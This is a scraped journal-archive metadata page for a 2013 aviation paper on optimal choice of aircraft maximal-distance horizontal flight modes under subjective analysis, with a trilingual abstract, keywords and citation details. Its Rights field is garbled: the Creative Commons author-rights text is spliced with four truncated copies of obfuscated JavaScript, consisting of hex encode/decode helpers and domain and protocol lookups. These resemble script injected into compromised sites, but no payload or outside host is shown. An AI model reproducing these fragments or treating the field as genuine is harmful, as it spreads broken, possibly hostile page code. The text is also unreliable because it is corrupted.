AIRCRAFT MAXIMAL DISTANCE HORIZONTAL FLIGHTS IN THE CONCEPTUAL FRAMEWORK OF SUBJECTIVE ANALYSIS
Наукові журнали Національного Авіаційного Університету
View Archive InfoField | Value | |
Title |
AIRCRAFT MAXIMAL DISTANCE HORIZONTAL FLIGHTS IN THE CONCEPTUAL FRAMEWORK OF SUBJECTIVE ANALYSIS
Горизонтальные полеты самолета на максимальную дальность в концептуальных рамках субъективного анализа Горизонтальні польоти літака на максимальну дальність у концептуальних рамках суб’єктивного аналізу |
|
Creator |
Goncharenko, Andriy; National Aviation University
|
|
Subject |
—
decision making; extremal; horizontal flight; individual’s preferences; maximal distance; modes control; optimal choice; subjective entropy; variational problem 621.435 — вариационная задача; горизонтальный полет; индивидуальные предпочтения; максимальная дальность; оптимальный выбор; принятие решений; субъективная энтропия; управление режимами; экстремаль 621.435 — варіаційна задача; горизонтальний політ; екстремаль; індивідуальні переваги; керування режимами; максимальна дальність; оптимальний вибір; прийняття рішень; суб’єктивна ентропія 621.435 |
|
Description |
This paper reflects the aspects of optimal choice for an aircraft’s maximal distance horizontal flights on the basis of multi-alternativeness of the flights operational modes control and at the possibility of the subjectively preferred controls conflicts within the conceptual framework of subjective analysis (preferences theory) in application to the decision making process under the uncertainty
Рассмотрены аспекты оптимального выбора для горизонтальных полетов самолета на максимальную дальность на основе многоальтернативности управления эксплуатационными режимами полетов и при возможности конфликтов субъективно предпочитаемых управлений в концептуальных рамках субъективного анализа (теории предпочтений) в приложении к процессу принятия решений в условиях неопределенности Розглянуто аспекти оптимального вибору для горизонтальних польотів літака на максимальну дальність на основі багатоальтернативності керування експлуатаційними режимами польотів та за можливості конфліктів суб’єктивно переважних керувань у концептуальних рамках суб’єктивного аналізу (теорії переваг) у застосуванні до процесу прийняття рішень в умовах невизначеності |
|
Publisher |
National Aviation University
|
|
Contributor |
—
— — |
|
Date |
2013-12-30
|
|
Type |
—
— — |
|
Format |
application/pdf
application/pdf application/pdf |
|
Identifier |
http://jrnl.nau.edu.ua/index.php/visnik/article/view/5537
10.18372/2306-1472.57.5537 |
|
Source |
Proceedings of the National Aviation University; Том 57, № 4 (2013); 56-62
Вестник Национального авиационного университета; Том 57, № 4 (2013); 56-62 Вісник Національного Авіаційного Університету; Том 57, № 4 (2013); 56-62 |
|
Language |
uk
|
|
Rights |
// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e
Автори, які публікуються у цьому журналі, погоджуються з такими умовами:Автори залишають за собою право на авторство своєї роботи та передають журналу право першої публікації цієї роботи на умовах ліцензії Creative Commons Attribution License, котра дозволяє іншим особам вільно розповсюджувати опубліковану роботу з обов'язковим посиланням на авторів оригінальної роботи та першу публікацію роботи у цьому журналі.Автори мають право укладати самостійні додаткові угоди щодо неексклюзивного розповсюдження роботи у тому вигляді, в якому вона була опублікована цим журналом (наприклад, розміщувати роботу в електронному сховищі установи або публікувати у складі монографії), за умови збереження посилання на першу публікацію роботи у цьому журналі.Політика журналу дозволяє і заохочує розміщення авторами в мережі Інтернет (наприклад, у сховищах установ або на особистих веб-сайтах) рукопису роботи, як до подання цього рукопису до редакції, так і під час його редакційного опрацювання, оскільки це сприяє виникненню продуктивної наукової дискусії та позитивно позначається на оперативності та динаміці цитування опублікованої роботи (див. The Effect of Open Access).// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e// o;o++)t+=e.charCodeAt(o).toString(16);return t},a=function(e){e=e.match(/[\S\s]{1,2}/g);for(var t="",o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "jrnl.nau.edu.ua"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e |
|